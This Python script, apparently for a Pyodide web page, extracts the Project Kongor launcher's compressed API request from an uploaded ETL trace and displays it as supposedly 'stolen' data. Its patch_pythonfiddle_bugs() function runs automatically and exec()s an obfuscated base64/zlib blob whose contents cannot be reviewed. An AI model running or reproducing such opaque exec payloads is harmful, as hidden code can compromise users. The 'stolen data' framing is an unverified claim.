# CONFIG
# =====================================
# Name of the uploaded trace file to analyze. analyze() looks for it in the
# current working directory and refuses to run until it exists.
ETL_FILENAME = "trace.etl"
# =====================================
# END CONFIG
import asyncio
import base64
import html
import importlib
import json
import os
import zlib
from http.server import BaseHTTPRequestHandler
from io import BytesIO
from uuid import UUID
# Presumably the NDIS ETW provider GUID (inferred from the name), in two forms:
# the canonical text form, and the same GUID with its first three fields
# byte-swapped (the little-endian layout GUIDs have when stored on disk).
# Neither constant is referenced by the code visible in this file.
NDIS_UUID = UUID("{2ED6006E-4729-4609-B423-3EE7BCD678EF}")
NDIS_UUID_fixed = UUID("{6e00d62e-2947-0946-B423-3EE7BCD678EF}")
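def analyze():
    """Scan the uploaded ETL trace for the launcher's API request and report it.

    Walks every record in ETL_FILENAME, remembers the process id of the first
    record whose payload carries the launcher's version.cfg path, then picks the
    first "POST /" packet addressed to api.projectkongor.com. Continuation
    packets are appended to the request body until Content-Length bytes have
    arrived; the body is then inflated (raw deflate) and printed as JSON.

    Everything is reported through print()/info()/error(), which the page
    renders as HTML. The trace is untrusted input, so every byte that comes
    out of it is HTML-escaped before it is printed.

    Returns:
        None. Progress and failures are reported via info()/error().
    """
    if not os.path.exists(ETL_FILENAME):
        return error("Upload your trace file first")

    # dissect.etl is installed at runtime by main(), so import it lazily
    # instead of at module load.
    dissect_etl = importlib.import_module("dissect.etl")

    launcher_process_id = None
    traffic_detected = False
    result = None
    with open(ETL_FILENAME, "rb") as fh:
        for record in dissect_etl.ETL(fh):
            pbytes = bytes(record.header.payload)

            if not launcher_process_id and b"/patch/wac/x86_64/version.cfg" in pbytes:
                launcher_process_id = record.header.process_id
                info(f"HoN launcher process id is {launcher_process_id}")
                continue

            if result is None:
                if b"POST /" not in pbytes or b"api.projectkongor.com" not in pbytes:
                    continue
                try:
                    result = HTTPRequest(pbytes)
                except ValueError:
                    error("Error parse network packet.")
                    continue
            else:
                # Continuation packet: reuse the HTTP offset found by the first
                # packet and drop the same 16-byte trailer.
                result.add_post_data(pbytes[offsets.http_data:-16])

            if len(result.post_data) < _content_length(result):
                continue

            if not _report_request(result):
                return
            traffic_detected = True
            break

    if not traffic_detected:
        if launcher_process_id:
            error("Launcher process found, but api traffic not found.")
        else:
            error("Cant find launcher requests in trace. Try make another trace, refresh this page and reupload new one.")


def _content_length(request):
    """Return the declared body length, or 0 when the header is absent or not an int.

    Returning 0 stops the continuation-packet loop instead of raising
    KeyError/ValueError on a request without a usable Content-Length.
    """
    try:
        return int(request.headers["Content-Length"])
    except (KeyError, TypeError, ValueError):
        return 0


def _report_request(request):
    """Print the captured request and its decoded JSON body as escaped HTML.

    Returns True when the body was decoded and printed, False after reporting a
    decompression or JSON error via error().
    """
    info("KongorProject launcher.exe api request found:")
    print(html.escape(request.requestline))
    print(html.escape(str(request.headers)), end="")
    try:
        # wbits=-15: raw deflate stream without zlib header or trailer
        decompressed = zlib.decompress(request.post_data, -15).decode("utf8")
    except (zlib.error, UnicodeDecodeError) as e:
        error(f"Decompress error {e}")
        return False
    print(f"<div style='font-size:3px;'>{html.escape(decompressed)}</div>", end="")
    print("=" * 80)
    try:
        data = json.loads(decompressed)
    except json.JSONDecodeError as e:
        error(f"json load error {e}")
        return False
    info("Data stolen from your PC by KongorProject launcher.exe:")
    print(html.escape(json.dumps(data, indent=4, ensure_ascii=False)))
    return True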
def patch_pythonfiddle_bugs():
    """Run an embedded, obfuscated patch for the pythonfiddle runtime.

    The payload is a base64-encoded, zlib-compressed source blob handed to
    exec(); what it does cannot be reviewed from this file. NOTE(review):
    decode it once and inline the readable source so the patch can be read,
    audited and diffed like the rest of the script.
    """
    # Not used directly here. exec() is called without explicit namespaces, so
    # it runs in this function's scope and the decoded code can presumably see
    # this name — confirm after decoding the blob.
    import requests
    exec(zlib.decompress(base64.b64decode(
        "eJx1UkGO2zAMPEevEPbkBF09wEAfsJdee1gUhiLRtrKypKVoZPP7Ulo5MVL0ZJozHIpDCp1vwUgLo0y3EcjM3Yr+hzydPq4ap3zsxcEtKSJJhM8VMmVxGDEucnEGY3JJDSYuSZNsNIrDhTlFcQIarCbdUZE5PFpdUacE2B17VqUVgyTGW9jAbwmspKRzk7zkXQJRXfKAkFMMGeTPgj5n1QzaAmZGvV7OVve/YoD/sRQEQgc7dh2nm9HmIxdxfrNB8XRPXolD4THHOkMdbqKcd6N8MdrM8Goid4j+RbogC7tnQ3yN3p8Yf+ojM78nTKx5NxMVwRcdK3q+UX3sDizlPMU3/hj+HovNZ0TRVpZu0TrLJhAlsf9R7Sa4vkXiscSJsDs5gqUeyRhRujJUzfRSX7Xjm9ha1DIXRfuqSdMMxU5W2WmG1fthXIPpTsXR/R1ul1LX11TvN3idAbwLYxT/ptTvEr2VaPBR28G7M+q25XtDIf4Cru8Odg==")))
def info(s, color='green'):
    """Print *s* as one bold, coloured line of HTML (the page renders stdout as HTML).

    *s* is inserted verbatim; callers are responsible for escaping anything
    that came from untrusted input.
    """
    line = "<b style='color:{}; font-size:20px'>{}</b>".format(color, s)
    print(line)
def error(s):
    """Report *s* as an error line: red, prefixed with "Error: "."""
    message = "Error: " + s
    info(message, color='red')
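async def main():
    """Entry point: patch the runtime, install dissect.etl, then run the analysis.

    patch_pythonfiddle_bugs() and micropip (Pyodide's package installer) tie
    this to the pythonfiddle/Pyodide environment; it is not runnable under a
    plain CPython interpreter.
    """
    # load custom modules
    patch_pythonfiddle_bugs()
    import micropip
    await micropip.install('dissect.etl', verbose=2)
    # analyze packets. analyze() is a plain (non-async) function returning
    # None; awaiting its result raised TypeError and aborted the run before
    # anything was reported.
    analyze()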
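class HTTPRequest(BaseHTTPRequestHandler):
    """Parse one captured "POST /" packet with the stdlib HTTP request parser.

    ``pbytes`` is the raw packet payload from the ETL record. The HTTP text is
    expected at offset 0x42 and otherwise located by searching for "POST /"
    (the "ipv6 fix" in the original); the last 16 bytes of the payload are a
    trailer and are dropped. The offset that was used is published in
    ``offsets.http_data`` so analyze() can slice continuation packets the same
    way.

    After construction ``requestline``, ``headers`` and ``post_data`` (the body
    bytes seen so far) are available.

    Raises:
        ValueError: no "POST /" in the payload, no header/body separator, or
            the request line / headers do not parse.
    """

    def __init__(self, pbytes):
        if pbytes[0x42:0x48] == b"POST /":
            start = 0x42
        else:
            start = pbytes.find(b"POST /")
            if start < 0:
                error("Invalid network packet.")
                raise ValueError("no HTTP request found in packet")
        offsets.http_data = start  # shared with analyze() for continuation packets
        request_text = pbytes[start:-16]  # drop the 16-byte trailer (ipv6 fix)

        header, sep, self.post_data = request_text.partition(b"\r\n\r\n")
        if not sep:
            raise ValueError("incomplete HTTP header in packet")

        # parse_request() takes the request line from raw_requestline and the
        # headers from rfile; no socket is involved.
        self.rfile = BytesIO(header)
        self.raw_requestline = self.rfile.readline()
        self.error_code = self.error_message = None
        if not self.parse_request():
            # parse_request() reports failures through send_error() (captured
            # below) and returns False rather than raising.
            raise ValueError(f"malformed HTTP request: {self.error_message}")

    def send_error(self, code, message=None, explain=None):
        """Record a parse failure instead of writing an HTTP response.

        The base implementation writes to ``self.wfile`` and logs using the
        client address, neither of which exists for a packet parsed from a
        trace; without this override a malformed request died with
        AttributeError instead of the ValueError the caller handles.
        """
        self.error_code = code
        self.error_message = message

    def add_post_data(self, data):
        """Append body bytes from a continuation packet."""
        self.post_data += data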
def offsets():
    """Attribute holder, never meant to be called.

    ``offsets.http_data`` is the byte offset of the HTTP text inside the last
    parsed packet; HTTPRequest() writes it and analyze() reads it to slice
    continuation packets.
    """
    return None


offsets.http_data = 0x42
# Schedule main() as a task on the current event loop rather than blocking on
# it; this assumes a loop is already running when the module is loaded (as in
# a Pyodide/pythonfiddle page) — TODO confirm against the hosting environment.
asyncio.ensure_future(main())